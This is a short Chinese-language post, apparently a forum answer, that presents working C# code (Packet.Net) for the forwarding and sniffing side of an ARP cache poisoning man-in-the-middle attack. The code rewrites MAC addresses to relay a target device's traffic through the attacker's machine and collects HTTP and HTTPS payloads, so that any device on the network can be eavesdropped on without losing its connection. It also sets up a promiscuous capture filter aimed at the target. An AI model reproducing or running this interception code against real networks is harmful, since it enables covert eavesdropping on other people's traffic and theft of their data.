我终于可以通过应用ARP缓存中毒使它正常工作,而下面的代码能够将任何设备的数据包重定向到目的地,这样您就可以捕获网络上任何设备的数据包,而不会丢失该设备的互联网访问权限。
码:
private void StartSniffer()
{
RawCapture rawCapture;
do
{
if ((rawCapture = capturedevice.GetNextPacket()) != null)
{
EthernetPacket Packet = PacketDotNet.Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data) as EthernetPacket;
if (Packet == null) { return; }
AcceptedPacket acPacket = new AcceptedPacket();
acPacket.Packet = Packet;
if (Packet.SourceHwAddress.Equals(TargetMAC))
{
Packet.SourceHwAddress = capturedevice.MacAddress;
Packet.DestinationHwAddress = GatewayMAC;
capturedevice.SendPacket(Packet);
if (acPacket.TCPPacket != null &&
((acPacket.Type.Equals("HTTPS") && acPacket.TCPPacket.PayloadData != null) ||
(acPacket.Type.Equals("HTTP") && acPacket.TCPPacket.PayloadData != null)))
{
materialListView1.BeginInvoke(new Action(() =>
{
materialListView1.AddObject(acPacket);
if (materialListView1.Items.Count > 15 && !ResizeDone)
{
olvColumn8.MaximumWidth = 65;
olvColumn8.MinimumWidth = 65;
olvColumn8.Width = 65;
ResizeDone = true;
}
ListofAcceptedPackets.Add(acPacket);
}));
}
}
else if (Packet.SourceHwAddress.Equals(GatewayMAC))
{
IPv4Packet IPV4 = Packet.Extract(typeof(IPv4Packet)) as IPv4Packet;
if (IPV4.DestinationAddress.Equals(Target))
{
Packet.SourceHwAddress = capturedevice.MacAddress;
Packet.DestinationHwAddress = TargetMAC;
capturedevice.SendPacket(Packet);
}
if (Properties.Settings.Default.PacketDirection == "Inbound")
{
if (acPacket.TCPPacket != null &&
((acPacket.Type.Equals("HTTPS") && acPacket.TCPPacket.PayloadData != null) ||
(acPacket.Type.Equals("HTTP") && acPacket.TCPPacket.PayloadData != null)))
{
materialListView1.BeginInvoke(new Action(() =>
{
materialListView1.AddObject(acPacket);
if (materialListView1.Items.Count > 15 && !ResizeDone)
{
olvColumn8.MaximumWidth = 65;
olvColumn8.MinimumWidth = 65;
olvColumn8.Width = 65;
ResizeDone = true;
}
ListofAcceptedPackets.Add(acPacket);
}));
}
}
}
}
} while (snifferStarted);
这是捕获设备的设置:
try
{
snifferStarted = true;
if (capturedevice != null)
{
capturedevice.Open(DeviceMode.Promiscuous, 1000);
capturedevice.Filter = $"(ip and ether src {targetmac.ToLower()}) or (ip and ether src {gatewayMAC.ToLower()} and dst net {Target})";
new Thread(() => { StartSniffer(); }).Start();
}
else
{
MetroMessageBox.Show(this, "No Capture Device is selected!", "Error", MessageBoxButtons.OK,
MessageBoxIcon.Error);
}
}
catch (Exception exception)
{
MetroMessageBox.Show(this, exception.Message, "Error", MessageBoxButtons.OK,
MessageBoxIcon.Error);
}
注意:这是使用Packet.Net NOT PcapDotNet 。